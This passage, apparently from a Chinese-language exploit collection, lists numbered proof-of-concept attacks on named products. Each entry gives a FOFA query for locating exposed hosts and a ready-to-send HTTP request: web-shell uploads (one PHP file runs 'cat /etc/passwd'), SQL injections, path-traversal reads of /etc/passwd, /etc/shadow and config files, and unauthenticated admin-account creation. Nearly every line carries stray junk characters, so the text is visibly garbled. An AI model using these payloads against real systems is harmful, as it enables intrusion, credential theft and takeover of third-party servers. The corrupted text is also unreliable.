0 T/ R( |- [* k, T<soap:Body>: g7 h3 r1 W( A- T8 r) L9 V
<UploadResume xmlns="http://tempuri.org/">
$ K( a* ]0 J/ V$ [( A3 T<ip>1</ip>% p, F# u: ~4 T6 F; D% }, \9 A
<fileName>../../../../dizxdell.aspx</fileName>9 F! f' g$ ^* ]: L+ z( N: l0 J
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>7 z0 O Z" B2 C* w& F6 j8 r& H' x
<tag>3</tag>
; \0 F; n1 W! n% Q, X6 D+ a</UploadResume>
. ^0 E4 A- @& J- R9 a$ u0 s. N! |</soap:Body>3 q* u' C% B9 V
</soap:Envelope>/ e. L7 K- m' k7 m% X& T
( P5 x6 Z) l1 P% z" a; v
% S% x' v' X( t }5 ^
http://x.x.x.x/dizxdell.aspx4 q- l% f9 v% t" r9 S/ P
: C4 U; j- H! Z162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传" ]2 } M' z. x5 m+ F" m, o2 n
FOFA: app="和丰山海-数字标牌"
# b) K5 \# z+ i {POST /QH.aspx HTTP/1.1
4 b$ f( S6 {' O' YHost: x.x.x.x
5 B9 w F2 b) @! sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0% F* g# d9 N9 T
Connection: close
" B- }1 N* k' G9 wContent-Length: 5834 c) o( A* g* G2 P9 q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey3 R- o p. }6 {# b. g
Accept-Encoding: gzip3 t' d% }' n9 h* }5 y
0 f4 r) v: m; A; w
------WebKitFormBoundaryeegvclmyurlotuey4 M. i% |3 L, D* `( D
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
1 _3 q8 o/ o* D- D9 B2 oContent-Type: application/octet-stream
$ u2 K3 q! A% d
: V- [+ B$ J! B: A+ z6 _<% response.write("ujidwqfuuqjalgkvrpqy") %>1 n% b/ ~2 x) B% ?
------WebKitFormBoundaryeegvclmyurlotuey
- P! a0 v& D4 ]& `9 N9 NContent-Disposition: form-data; name="action"$ m6 v- I9 @7 ~9 n4 M6 S
0 W+ ]5 t/ m8 k2 Rupload7 m ~4 J6 W' q- j4 r% i" D9 R
------WebKitFormBoundaryeegvclmyurlotuey
' f/ \; g# V7 O5 K; TContent-Disposition: form-data; name="responderId"
& }/ Y. d X$ e. a# w2 ?0 |* J! l! L1 w
ResourceNewResponder
( D. j6 s6 q) z: I------WebKitFormBoundaryeegvclmyurlotuey
, X4 C! ~+ V+ ~; z& X. i1 ]* `% `$ S5 SContent-Disposition: form-data; name="remotePath": [. C* p- U. u! B+ b: u( _4 l
6 G5 {, s/ q# t! U( k4 O
/opt/resources5 [. J& `# W# [1 Q' P
------WebKitFormBoundaryeegvclmyurlotuey--
/ y# ~) r7 W5 p8 [0 J; a0 z+ t
3 R6 b3 k6 e4 F( W$ e) ~( R* h$ ^3 k2 [' H1 C# z- z* |3 @2 d- v
http://x.x.x.x/opt/resources/kjuhitjgk.aspx* h- D7 a# K! K/ X/ a
7 ?4 X' |3 X7 o' m. N4 F3 ?
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传1 Q, h$ k# i4 Z
FOFA: icon_hash="-795291075"
" Q. ?! F' Y0 N" q& t$ e6 U) R( WPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1, b+ _$ z* H0 _
Host: x.x.x.x
: l# p. l. C: ~/ AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
0 @# h2 S" U, D' ]% i W0 dConnection: close
( k5 @: y3 A7 Q9 N2 A2 O. wContent-Length: 293; t2 w4 M( F- h, ?+ V% l
Accept: */*, K$ o7 o W' ^) {" O/ k
Accept-Encoding: gzip, deflate8 e: Q; e2 I0 _( ^% s
Accept-Language: zh-CN,zh;q=0.9' J4 g0 {' L) A6 x; `$ ^
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod$ c! w8 I! E6 p: x+ x5 M; _
4 K8 o8 l" v0 j3 z( o2 K/ P1 @------iiqvnofupvhdyrcoqyuujyetjvqgocod0 z% h5 m. J' q
Content-Disposition: form-data; name="name"
W. A# u* }9 V% W/ W7 ]) [
% E! F( P$ j: b4 E) x# Y1.php: W( j/ `/ d" g. {# l2 b
------iiqvnofupvhdyrcoqyuujyetjvqgocod% `* n7 ~! `6 [8 q% m4 I
Content-Disposition: form-data; name="upfile"; filename="1.php"
0 F" p% j; ^/ ^! h2 sContent-Type: image/jpeg7 V5 F8 A" e2 O8 U5 L( X
+ j* m9 A0 T, L# i7 i
rvjhvbhwwuooyiioxega6 A/ K$ \7 [" J
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
$ [0 e/ n a; X3 W4 d! G! o5 Y, X! E8 `' A0 N9 ]: U# B
6 z: Z; ~5 ~" m) ]3 A* q0 A/ u8 U
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传3 q$ }; {" k( o7 h) T
FOFA: title="智慧综合管理平台登入"
/ g: d+ ]" \/ g+ K- a1 jPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.18 ?/ I/ e( |* |- n1 P
Host: x.x.x.x
/ [% o p6 ~4 M. i5 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
6 s( b5 |" A- q ]Content-Length: 288
5 i P! Y: Q e' l' ~$ |$ n) CAccept: application/json, text/javascript, */*; q=0.01
3 R! e2 g( @# c2 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,0 m( W$ @- H8 V1 l
Connection: close. y7 ^1 i9 j& g
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
8 Q2 E3 f8 z8 W0 ZX-Requested-With: XMLHttpRequest
; I. L: s4 m9 \" N# m! B1 eAccept-Encoding: gzip
$ M' A, C7 p* P6 m* u4 n: z( O1 a# ]- k
------dqdaieopnozbkapjacdbdthlvtlyl6 g* W8 \6 n5 i8 f, ]. u
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
# B/ L ~5 h8 b, B: UContent-Type: image/jpeg
u% S7 W% s# q& r& O, Z* L, U
4 N, N7 t4 c" K7 D<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 {: E1 S, \+ _/ E E& x------dqdaieopnozbkapjacdbdthlvtlyl--! ] L6 _7 l& w5 i+ @$ ^/ W
5 J! H% L g& K" L% m4 P5 G
" N7 X! n! u h; `- b: H
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx3 f4 ]4 }; ]) y- k! v d- ~2 [
% I% R$ S: Z5 ^$ F; h165. OrangeHRM 3.3.3 SQL 注入$ k: F! C: H5 k6 @) d0 c. m) C
CVE-2024-36428' Y6 @% \, Z- R0 j: w- G, w$ q
FOFA: app="OrangeHRM-产品"+ s( I7 M! H! \5 b! _
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
$ z& p8 a: H) }7 {
3 d" r7 {$ O3 o. ?: C3 {& X( U
0 }3 D9 J7 f6 y, W6 ~8 y8 b166. 中成科信票务管理平台SeatMapHandler SQL注入
3 C9 w9 t- C7 @( n8 d) c. nFOFA:body="技术支持:北京中成科信科技发展有限公司"8 }3 a. }; `$ R
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
# \+ o" f2 O0 Q: Z% k9 tHost:
5 n8 ?- i) n; KPragma: no-cache. j0 A% }+ y0 E% w$ S5 ^
Cache-Control: no-cache
% o4 F! A" n8 Z# e9 c& F2 hUpgrade-Insecure-Requests: 1+ U' F7 Q) [& n- g* ]+ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ m& a/ V4 Y) [5 \, B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 F; J Q8 B" j6 Q8 Y( R
Accept-Encoding: gzip, deflate5 h0 q; i8 G" j" f; K! Z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- v2 Y3 E6 ^" p: v
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE' I- b5 m: g3 G6 ~8 n) B" u, `
Connection: close u5 y) U* |2 k( ~( V
Content-Type: application/x-www-form-urlencoded
$ q! W$ I9 y4 [4 B* {) N0 eContent-Length: 89; s/ q, p2 D" n$ H" T2 y
% D0 \/ s# Y, Z3 wMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE ^- b# s. a( x0 l( T. V
6 y9 K4 J1 n1 @: N8 y0 B# V1 A0 _$ p( P D2 R
167. 精益价值管理系统 DownLoad.aspx任意文件读取
0 X5 ~ [2 g* L# ]FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"; `2 t7 ~3 f! L5 x/ Z8 V
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
; P* b$ a {" T% x* cHost:
- _- L5 G! T7 i lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; H" Q+ U1 a. \5 r V( \& k0 gContent-Type: application/x-www-form-urlencoded
: T0 f& }- J) u$ DAccept-Encoding: gzip, deflate+ Y) G( ?$ L/ D' e
Accept: */*: F2 ^1 X9 `8 \, k0 P
Connection: keep-alive% c) x# f- w& {, D c% F6 @/ c
9 Y: u. [( S4 \2 n" g( |( G, E- L9 @: [
168. 宏景EHR OutputCode 任意文件读取' |# W! j) e+ a
FOFA:app="HJSOFT-HCM"4 ^. W& `/ o: e0 p3 A* p7 N
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
5 |1 g) O Z+ V2 I6 |3 Y! SHost: your-ip, F7 G* y5 J3 g* Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.361 W# s0 b6 S# h9 S# G+ j" }
Content-Type: application/x-www-form-urlencoded
3 c! G3 Y" i5 X- g! _, _Connection: close G2 R; H3 _7 B3 U4 S
- n$ i: D6 R4 B' Q! i
0 P; e8 W4 x7 @$ G! n$ \% ]% a3 T7 N, H5 C: H6 h& C6 {" T8 K
169. 宏景EHR downlawbase SQL注入' {- X) s: o. F) o
FOFA:app="HJSOFT-HCM"
. P# j3 p7 C- D3 X1 OGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
: R0 M" e* M' p( T! M4 `Host: your-ip
# A* {! W+ F/ g( fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 o+ ?( U6 p9 HAccept: */*4 \' }' Z* g2 y- a
Accept-Encoding: gzip, deflate; T! |+ Z9 T* m0 i
Connection: close
/ b/ ^8 y. ~0 E5 R7 D7 P2 w& z( J. X; y5 d! U! a
- c$ U0 g' ^1 V2 N3 O+ G5 [7 t: p
$ C6 B! h% g" H2 E) Q& s9 G
170. 宏景EHR DisplayExcelCustomReport 任意文件读取/ q" g; `# ?' U4 a- S% ^; C' Y9 i) X% x
FOFA:body="/general/sys/hjaxmanage.js" Q- P# k. S) ^+ ?( ^
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
0 j) X( L" i) l: G: OHost: balalanengliang$ e/ B; m0 V1 x* p$ T
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 R) ^8 V5 A" m: |8 Q& l gContent-Type: application/x-www-form-urlencoded
0 Y5 @% x" o' f h% m! f7 n9 n) P6 p' v7 E4 L
filename=../webapps/ROOT/WEB-INF/web.xml( p- n/ |$ M( P& ~: L' n9 y4 N
6 `& M8 S+ P$ |# Q
4 |. U+ u6 G7 Q t8 x6 _' j8 H171. 通天星CMSV6车载定位监控平台 SQL注入8 \* V# m2 U8 |0 a
FOFA:body="/808gps/"
: v/ d Q+ `. g# y+ E3 S9 nGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
+ `* b/ o. d% A& }* b6 y7 UHost: your-ip
5 Q6 S0 k/ O6 M2 g% C3 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
1 p3 { X0 }7 p$ mAccept: */*
6 `; T' M. T8 `! ]9 ?6 k% ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 j6 ]# `/ Y! u% I3 B2 U% i+ _Accept-Encoding: gzip, deflate
7 H& ]' D$ m4 `8 N. m! M( U6 Q5 OConnection: close/ C8 }9 b6 P i$ `; Q
7 _0 E2 v) e: O' S& m% ]. t
' s9 j2 m7 ~; i2 b R* V; X
5 e: p- f1 \; ^5 B+ J, a3 t) G172. DT-高清车牌识别摄像机任意文件读取& V/ s" h+ p: y& [6 O7 m0 O
FOFA:app="DT-高清车牌识别摄像机"" \* a! l! D3 X0 T5 L
GET /../../../../etc/passwd HTTP/1.1
# p9 u( @$ V+ N9 SHost: your-ip1 j5 t# r6 v4 V2 E1 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 I" o5 P0 F; [6 ?1 f
Accept-Encoding: gzip, deflate
; w; p% o" o- e7 B5 u- g& eAccept: */*
5 p- t$ X% d( t5 S& ?" f' ?Connection: keep-alive
! C x o r- a$ `: R& E
7 I" @$ i+ |% I% E, ^+ x, J c4 T, g# n( F
/ p6 Y( P5 N+ V! A( S) I173. Check Point 安全网关任意文件读取* k+ c5 Y) ^" T, Q( b
CVE-2024-24919
5 b# X6 E# B+ ?8 ?$ _3 {6 G* SFOFA:app="Check_Point-SSL-Network-Extender"
$ a5 G( a2 _" j2 _( l" ^POST /clients/MyCRL HTTP/1.1. L+ t8 e. i+ x4 k3 v+ \/ L
Host: your-ip( \( E6 ?, O/ R! Q6 I' N( d
Content-Type: application/x-www-form-urlencoded* Z0 T0 c4 \% O( l- w
5 r& F+ J! n- j- ~- raCSHELL/../../../../../../../etc/shadow. f6 b& M) d$ ^( O
( u8 s* }7 a( c
( W$ ~; |1 _/ g$ e
" _8 ^. L, w, w/ K9 H2 s
174. 金和OA C6 FileDownLoad.aspx 任意文件读取( |6 M" O9 l2 O) x! C( K1 c, U
FOFA:app="金和网络-金和OA"
+ g9 \* h1 K; e+ d4 @5 QGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.19 Q4 {2 \. z: A* m2 y
Host: your-ip' U" l+ p' B2 n: q+ T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) X( R: m9 }/ U' C+ C0 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 W; o6 N+ Y5 R) }: IAccept-Encoding: gzip, deflate, br" c0 k" v6 \( f3 ~
Accept-Language: zh-CN,zh;q=0.9: ^7 g4 R/ q: l/ n7 A3 v
Connection: close
! L! D+ |. x: A* ?7 J+ W3 X, m
* l& A" N2 w9 {) V9 t6 h
' o! p7 e. t) b: s' p
; d* x5 ^) m5 Q- }& V( e175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; `# f8 @& w6 J) nFOFA:app="金和网络-金和OA"$ C3 @3 G1 V; l: i& A
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1/ {% @) l7 c* K9 P
Host:7 }0 w# U9 D6 y& v" f( w
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) C8 t" a% ?! Y, R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! d; h+ j/ F3 N0 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
N) ]# [4 s, W/ C; Z% {Accept-Encoding: gzip, deflate
6 M/ O# P, R# ^: b4 f9 U% q% E5 ]/ @Connection: close
) ]' ^: l# _+ c# GUpgrade-Insecure-Requests: 15 ^% a) L# O9 S) p3 o
- x& K+ B! V1 |; t$ V# u
) u+ {- Z$ k4 m3 |$ K3 q: h
176. 电信网关配置管理系统 rewrite.php 文件上传
5 @- U3 q1 r5 b9 c9 i% {; bFOFA:body="img/login_bg3.png" && body="系统登录"" o& Q/ S7 A @: l- c8 {# ?
POST /manager/teletext/material/rewrite.php HTTP/1.1
" t; d$ W1 ^: x3 ?# v& e! OHost: your-ip5 {( k( B5 F( h" w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
7 k B" h0 X/ d8 H( |' CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT) a, W4 J- C. z4 D0 ?8 @
Connection: close
/ u$ z% L; C6 h2 A/ y: _! z; E+ U0 ]* [) i- H
------WebKitFormBoundaryOKldnDPT$ ~, R; s6 J, e7 Y+ Y9 W. h
Content-Disposition: form-data; name="tmp_name"; filename="test.php") W, t5 ?9 b* l+ C* O
Content-Type: image/png
. C m% _$ H" L : m; W8 ]& O/ n6 x) ~
<?php system("cat /etc/passwd");unlink(__FILE__);?>
1 W: N" x" r6 J8 C5 N/ r: v------WebKitFormBoundaryOKldnDPT
4 `1 M b$ x& H4 mContent-Disposition: form-data; name="uploadtime"% v& H0 x8 h, l, p
3 Y) q- [4 z: E# X
" ?4 u" m5 m& g' ?0 S) d0 Y) ] F------WebKitFormBoundaryOKldnDPT--6 l0 _* m3 T1 a; c' m. X
' y- t0 r0 _; O4 d! C# ~. n
M( G/ w% T! N7 \# h8 P' S
+ d7 @% I2 B4 X* l8 t# @7 P6 C
177. H3C路由器敏感信息泄露
0 H$ { O/ H; A% o6 D6 i4 i( w/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& u) F, ]( g* _* X% f
/userLogin.asp/../actionpolicy_status/../M60.cfg3 I6 j6 C( C# ^8 E G6 n
/userLogin.asp/../actionpolicy_status/../GR8300.cfg3 N( |8 |1 K' x) k- s, p
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
, j4 Z" U) G& G) b9 Y& c/userLogin.asp/../actionpolicy_status/../GR3200.cfg2 Q7 `$ K0 {8 ^8 H1 Y6 x
/userLogin.asp/../actionpolicy_status/../GR2200.cfg5 z5 O! ]7 E0 [6 a
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
. s4 n( T1 s K3 M" ]* X5 C. Z/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
+ V* O0 F+ s$ g! W5 F/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg3 D) y4 n) R$ t( @! C
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
8 c# T0 R# X8 r' n0 p Y8 ^+ ^) o/userLogin.asp/../actionpolicy_status/../ER5200.cfg5 M p; ?4 W% T" e1 o) i# v
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
( \" I! e% e/ M" _- Q6 s6 M1 d- q/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
1 ?! B1 L& \3 X* G J/userLogin.asp/../actionpolicy_status/../ER3260.cfg
" i# k3 C" y# A5 W; a1 [# |/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
0 s- d$ K' D9 M2 S+ J/userLogin.asp/../actionpolicy_status/../ER3200.cfg: l8 k) }0 H! U, F# G
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg2 N- v+ w! t1 ?" R9 ^0 a& c! j
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/ ?) q1 m ^9 Y: R1 O/ I+ R/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
1 z" I) x" J# |/userLogin.asp/../actionpolicy_status/../ER3100.cfg
. s# i0 T( x2 k% {0 {7 G% ?: W/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg3 ?5 G7 j: K: h0 P+ ^
. M# c" o* @( I5 w( ^4 }% F2 f/ ?
5 u$ h6 E; p4 c" m) I178. H3C校园网自助服务系统-flexfileupload-任意文件上传
7 R9 t8 _1 F* J; `( k/ uFOFA:header="/selfservice"
z/ W& F$ f0 q3 E8 LPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
) V) R3 I% ~& b; _2 E: CHost:
" R' J, D2 n3 C- @, N6 y+ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 Z! A" M9 R( ?0 \7 o+ l4 `2 G
Content-Length: 2528 g: F( C, ?9 I$ t, P& o/ J, Q
Accept-Encoding: gzip, deflate7 I9 O2 |0 v0 q$ o, i' y
Connection: close, C ~8 x1 R* Y% v4 z; s+ H
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l+ }$ z* k' |6 P! ]# F3 C+ ^/ w
-----------------aqutkea7vvanpqy3rh2l* l# q: S5 g& Q, p1 O3 L
Content-Disposition: form-data; name="12234.txt"; filename="12234"6 S: q' q) l( B# Y3 U3 V
Content-Type: application/octet-stream8 P/ W+ B/ y; p" Y' @6 ]$ h
Content-Length: 255
0 r: `0 j4 w1 k6 T+ m
# [, ~8 Z7 ?$ b12234
5 K) M: N7 P" B" d-----------------aqutkea7vvanpqy3rh2l--/ Z. [ ~# f3 b
! `# E1 R i* {" u+ ?- y7 h0 ?2 W1 q% m: ^; [
GET /imc/primepush/%2e%2e/flex/12234.txt
! F" {% X& y1 P6 G) Z8 M4 X$ W. n. h4 m5 q
% ~5 H/ [0 T/ {* U; ^' T179. 建文工程管理系统存在任意文件读取
1 L- g; B/ f" v7 d# aPOST /Common/DownLoad2.aspx HTTP/1.1
8 K8 ]' p! L6 f. W& _- HHost: {{Hostname}}: {5 r, D; h3 X; K8 x& I( [
Content-Type: application/x-www-form-urlencoded
0 j2 F5 }- `2 Q; ]4 n5 O7 t9 A5 M9 qUser-Agent: Mozilla/5.02 {( j# [2 Q" n2 Z% F% y
" B- v W+ J7 k# O. t
path=../log4net.config&Name=
8 S& v& v7 T& ~! o& H8 S2 s5 v, M# X% n+ F- r0 x! `/ K
- J0 Q) L9 \2 l+ R9 ?4 {& j
180. 帮管客 CRM jiliyu SQL注入
' |8 J8 g1 X8 x# w0 TFOFA:app="帮管客-CRM"
! h- `/ M1 r+ ?2 AGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
9 y+ b X! Q# v5 VHost: your-ip; C& j% i9 u, a' r: w8 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ {# N2 Z" w& e$ e. A+ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 ?3 a6 Q" g/ S( n4 \Accept-Encoding: gzip, deflate
4 b) u: Q4 b1 F# N. bAccept-Language: zh-CN,zh;q=0.9$ H) h, ~: x; G6 P4 \6 s
Connection: close
. j% j6 d2 [, M: ]4 V# q4 r9 _6 S6 |$ o9 r, P
; G5 j4 b" Y' q) v) }9 j181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
% q4 U% J7 ~2 m" k7 ]! Y% Y7 `FOFA:"PDCA/js/_publicCom.js") P- Y' s" z* T0 n3 }. q
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.10 O; \' w( M/ _* ]$ }% D
Host: your-ip: R5 d- _# \7 W8 r* Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 _; I& q8 H0 p5 h+ B8 T3 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. h" U3 x. g U/ k! x! mAccept-Encoding: gzip, deflate, br
* E, v" [: t& J2 O$ S9 K( YAccept-Language: zh-CN,zh;q=0.9
0 [8 q3 h3 p) l% o$ x7 Y5 n1 oConnection: close( J) ?0 s7 @6 ^
Content-Type: application/x-www-form-urlencoded" R/ W. H7 J m; X
8 L: C9 H" x6 I P' I+ u: }
) {6 k9 S g$ oaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20; C7 o" A. L b8 Q/ c& w
! }$ o I1 E) u8 R' S3 _6 b d3 y$ g: a2 }
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
+ L, y3 E) l. \$ u& |FOFA:"PDCA/js/_publicCom.js"- a! r; P/ E$ r; t; t* ]
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
, g2 V9 z2 E q- W5 Z' O) z7 h xHost: your-ip$ t7 m& t& N( I( w4 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.368 m, q+ O" k2 Q$ t9 {" ~ y6 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; L. h; _9 _1 n5 X0 h0 NAccept-Encoding: gzip, deflate, br) T/ k* d5 _8 l4 h5 K% \
Accept-Language: zh-CN,zh;q=0.9
4 O1 j5 V0 d2 _+ b ^' T' X; ]Connection: close. z7 R2 P8 }' d6 `+ a% w7 b9 y
Content-Type: application/x-www-form-urlencoded8 @6 J" ~! X* q; f! k- w
$ p3 r" e; p3 y" m8 f* ]5 A4 _* g5 U
username=test1234&pwd=test1234&savedays=1
( P2 J9 s# Y9 g
: C7 x3 x9 _0 X: ?/ d, G
2 n3 g3 U& g4 `1 t183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. j3 ^* T! F9 }
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"# ~4 W \7 [/ M1 |2 M" O; R
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
) }/ E/ M. D, ]7 B$ XHost: your-ip
8 S! Z6 d+ L! Y c; h. \, d" UUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, x% Y2 W3 W4 R' ]
Accept-Charset: utf-8& ]8 ~2 }+ u% {
Accept-Encoding: gzip, deflate
) n- @: ~8 d# G0 W* s2 QConnection: close
5 C8 y- d9 ~, z: m7 W& f& N& O$ a H: P! }/ h) u
7 _* V2 e" s. M/ M9 K1 s
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加' ]' w; g& s" P
FOFA:server="SunFull-Webs"0 e3 N7 X6 R5 i3 `% `' E7 }
POST /soap/AddUser HTTP/1.1' _ @7 ?4 D" w6 i9 d. s/ J) m
Host: your-ip
* Z2 h/ E( f# ]# `- J BAccept-Encoding: gzip, deflate
1 U; x" t9 E' A) d! L# P/ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+ O( n% w" A; ^+ J9 P6 a9 _Accept: application/xml, text/xml, */*; q=0.01
3 \3 [" V% [& ?$ y2 VContent-Type: text/xml; charset=utf-8/ E2 x' C* }- G' B y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
H! S; l8 G8 b+ Q: rX-Requested-With: XMLHttpRequest. r) s( p5 d6 b2 ~1 y! g
% r1 [0 S- y1 l1 {
( J& S6 m9 B6 C) E; X' [3 dinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')5 p6 h$ V m/ P7 h9 \
\) Y9 \$ n) O8 U0 R6 t$ z
